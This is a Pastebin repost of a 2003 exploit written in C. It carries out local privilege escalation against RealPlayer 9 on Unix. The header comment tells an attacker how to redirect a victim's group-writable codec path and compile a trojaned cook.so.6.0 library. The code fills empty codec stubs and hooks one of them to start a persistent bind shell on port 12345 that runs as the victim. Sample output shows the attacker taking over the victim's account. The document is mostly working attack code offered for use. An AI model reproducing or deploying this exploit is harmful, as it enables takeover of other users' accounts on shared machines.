API tools faq
paste
Advertisement
FlyFar

RealPlayer 9 *nix - Local Privilege Escalation

FlyFar
Mar 13th, 2024
509
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.24 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /**
  2.  * rp9-priv-esc.c
  3.  *
  4.  * A local privilege escalation attack against the community supported
  5.  * version of Real.com's Realplayer, version 9.
  6.  *
  7.  * Written by:
  8.  *  
  9.  *  Jon Hart warchild spoofed.org
  10.  *
  11.  * By default, configuration files are stored in ~$USER/.realnetworks/,
  12.  * but all the files in there are group writeable.  So long as ~$USER
  13.  * has group execution permissions (which is pretty common), a malicious
  14.  * local user can edit the config files of fellow users to do his biddings.  
  15.  *
  16.  * There are a number of ways to attack this, but after some poking it seems
  17.  * that modifying the path to shared libraries and writing my own malicious
  18.  * shared libraries was the easiest.  
  19.  *
  20.  * (as an aside, just because the shared libraries in the directories contained
  21.  * in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get
  22.  * the symbols back.  objdump quickly can tell us what the names of the 15
  23.  * functions are, and we can stub out a bogus shared library pretty quickly.)
  24.  *
  25.  * This particular bit of code is meant to replace the shared library
  26.  * cook.so.6.0, which is contained in the Codecs directory.  To execute this
  27.  * attack against a fellow local user, first edit their config file
  28.  * (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable
  29.  * point to a directory under your control, like /tmp/Codecs.  Copy all of the
  30.  * existing files from the previous value of dt_codecs (which is usually something
  31.  * like ~victim/Real/Codecs/) to /tmp/Codecs.  Next, compile the code below as a
  32.  * shared library and copy it to the trojaned directory:
  33.  *
  34.  *
  35.  * `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`
  36.  *
  37.  *  The next time the victim fires up realplayer 9, a nice little shell
  38.  * will be listening on port 12345 for you:
  39.  *
  40.  * guest@haiti:/$ id
  41.  * uid=1006(guest) gid=100(users) groups=100(users)
  42.  * guest@haiti:/$ nc localhost 12345
  43.  * id
  44.  * uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)
  45.  *
  46.  * Of course, you don't have to execute a shell.  Do whatever makes you happy.
  47.  *
  48.  * Fix?  `chmod 700 ~/.realnetworks/*`
  49.  *
  50.  *  Copyright (c) 2003, Jon Hart
  51.  * All rights reserved.
  52.  *
  53.  *  Redistribution and use in source and binary forms, with or without modification,
  54.  *  are permitted provided that the following conditions are met:
  55.  *
  56.  *  * Redistributions of source code must retain the above copyright notice,
  57.  *    this list of conditions and the following disclaimer.
  58.  *  * Redistributions in binary form must reproduce the above copyright notice,
  59.  *    this list of conditions and the following disclaimer in the documentation
  60.  *    and/or other materials provided with the distribution.
  61.  *  * Neither the name of the organization nor the names of its contributors may
  62.  *    be used to endorse or promote products derived from this software without
  63.  *    specific prior written permission.
  64.  *
  65.  *
  66.  *  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  67.  *  AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  68.  *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  69.  *  ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
  70.  *  LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  71.  *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  72.  *  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  73.  *  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  74.  *  OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
  75.  *  USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  76.  *
  77.  *
  78.  *
  79.  *
  80.  */
  81. #define PORT 12345
  82. #include <stdio.h>
  83. #include <signal.h>
  84. #include <sys/types.h>
  85. #include <sys/socket.h>
  86. #include <netinet/in.h>
  87. #include <stdlib.h>
  88.  
  89. void RAInitEncoder(void) { }
  90. /** This just happens to be one of the first
  91.  * functions that realplayer calls after cook.so.6.0 is loaded
  92.  */
  93. void RAOpenCodec2(void) { cookthis(); }
  94. void RAOpenCodec(void) {  }
  95. void RAGetNumberOfFlavors(void) {  }
  96. void RACloseCodec(void) {  }
  97. void RADecode(void) {  }
  98. void RAEncode(void) {  }
  99. void RAFreeEncoder(void) {  }
  100. void RAGetNumberOfFlavors2(void) {  }
  101. void RAFreeDecoder(void) {  }
  102. void RAFlush(void) {  }
  103. void RAGetFlavorProperty(void) {  }
  104. void G2(void) { }
  105. void RASetFlavor(void) {  }
  106. void RAInitDecoder(void) {  }
  107. void RACreateEncoderInstance(void) { }
  108.  
  109. /* Bind /bin/sh to PORT.  It forks
  110.  * and all that good stuff, so it won't
  111.  * easily go away.
  112.  */
  113. int cookthis() {
  114.  
  115.  
  116.         int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
  117.         struct sockaddr_in server_addr;
  118.         struct sockaddr_in client_addr;
  119.  
  120.         if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
  121.                 exit(EXIT_FAILURE);
  122.  
  123.         bzero((char *) &server_addr, sizeof(server_addr));
  124.         server_addr.sin_family = AF_INET;
  125.         server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
  126.         server_addr.sin_port = htons(PORT);
  127.  
  128.         if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0)
  129.                 exit(EXIT_FAILURE);
  130.         if (fork() != 0)
  131.                 exit(EXIT_SUCCESS);
  132.         setpgrp();  
  133.         signal(SIGHUP, SIG_IGN);
  134.         if (fork() != 0)
  135.                 exit(EXIT_SUCCESS);
  136.         if ((sock_recv = listen(sock_des, 5)) != 0)
  137.                 exit(EXIT_SUCCESS);
  138.         while (1) {
  139.                 sock_len = sizeof(client_addr);
  140.                 if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
  141.                         exit(EXIT_SUCCESS);
  142.                 client_pid = getpid();
  143.                 server_pid = fork();
  144.                 if (server_pid != 0) {
  145.                         dup2(sock_client,0);
  146.                         dup2(sock_client,1);
  147.                         dup2(sock_client,2);
  148.  
  149.                         execl("/bin/sh","realplay",(char *)0);
  150.                         close(sock_client);
  151.                         exit(EXIT_SUCCESS);
  152.                 }
  153.                 close(sock_client);
  154.         }
  155. }
  156.  
  157.  
  158.  
  159.  
  160. // milw0rm.com [2003-09-09]
  161.            
Tags: Exploit CVE Vulnerability local privilege escalation RealPlayer9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!